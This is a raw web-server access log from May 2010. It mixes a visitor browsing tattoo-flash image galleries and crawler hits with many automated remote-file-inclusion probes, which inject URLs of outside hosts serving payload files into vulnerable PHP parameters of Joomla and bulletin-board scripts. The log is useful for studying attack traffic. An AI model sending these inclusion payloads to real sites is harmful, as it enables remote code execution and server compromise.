124.0.74.195 - - [20/May/2010:09:02:17 -0500] "GET /logs/?shop_this_skin_path=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:09:02:18 -0500] "GET /logs/access_log.1271548800/?shop_this_skin_path=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:09:02:18 -0500] "GET /?shop_this_skin_path=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
38.101.148.126 - - [20/May/2010:09:02:28 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:09:02:37 -0500] "GET /logs/access_log.1244851200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
68.143.119.58 - - [20/May/2010:09:02:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://search.yahoo.com/search?ei=UTF-8&fr=yfp-t-892-s&p=bert+grimm+tattoo+flash&rs=1&fr2=rs-top""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:45 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:55 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:56 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:56 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:56 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:56 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:02:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:19 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:03:20 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
212.227.127.17 - - [20/May/2010:09:04:46 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.227.127.17 - - [20/May/2010:09:04:46 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:27 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:28 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:28 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:28 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:44 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:44 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:44 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:44 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:05:45 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:06:41 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:06:42 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:06:42 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.143.119.58 - - [20/May/2010:09:06:42 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.111.173.43 - - [20/May/2010:09:08:07 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.111.173.43 - - [20/May/2010:09:08:07 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
174.121.158.187 - - [20/May/2010:09:10:57 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:09:10:57 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:09:10:58 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:09:11:44 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:09:11:44 -0500] "GET /logs/access_log.1264982400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:09:11:44 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:09:11:44 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
76.195.227.166 - - [20/May/2010:09:12:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.195.227.166 - - [20/May/2010:09:12:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.195.227.166 - - [20/May/2010:09:12:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.195.227.166 - - [20/May/2010:09:12:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.195.227.166 - - [20/May/2010:09:12:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
76.195.227.166 - - [20/May/2010:09:12:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
38.101.148.126 - - [20/May/2010:09:12:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
216.127.70.140 - - [20/May/2010:09:12:30 -0500] "GET /logs/access_log.1265673600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
76.195.227.166 - - [20/May/2010:09:12:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
38.101.148.126 - - [20/May/2010:09:12:40 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
94.23.9.198 - - [20/May/2010:09:14:14 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:14:14 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:14:14 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:09:14:54 -0500] "GET /logs/access_log.1166400000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.9.198 - - [20/May/2010:09:15:00 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:22 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:22 -0500] "GET ///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:22 -0500] "GET /logs/access_log.1265414400///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:48 -0500] "GET ///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:48 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:16:48 -0500] "GET /logs/access_log.1265414400///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.46.13.41 - - [20/May/2010:09:17:05 -0500] "GET /logs/access_log.1245196800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.147.249 - - [20/May/2010:09:17:40 -0500] "GET //index.php?option=vwar_root&controller=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.208.42 - - [20/May/2010:09:17:40 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:09:17:40 -0500] "GET /logs//index.php?option=vwar_root&controller=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:09:17:40 -0500] "GET /logs/access_log.1271548800//index.php?option=vwar_root&controller=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.208.42 - - [20/May/2010:09:17:40 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.121.208.42 - - [20/May/2010:09:17:40 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:09:18:17 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:09:18:17 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:09:18:17 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:18:27 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:18:27 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:18:27 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.23.184 - - [20/May/2010:09:18:31 -0500] "GET /logs//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:09:18:31 -0500] "GET /logs/access_log.1273276800//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:09:18:31 -0500] "GET //atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
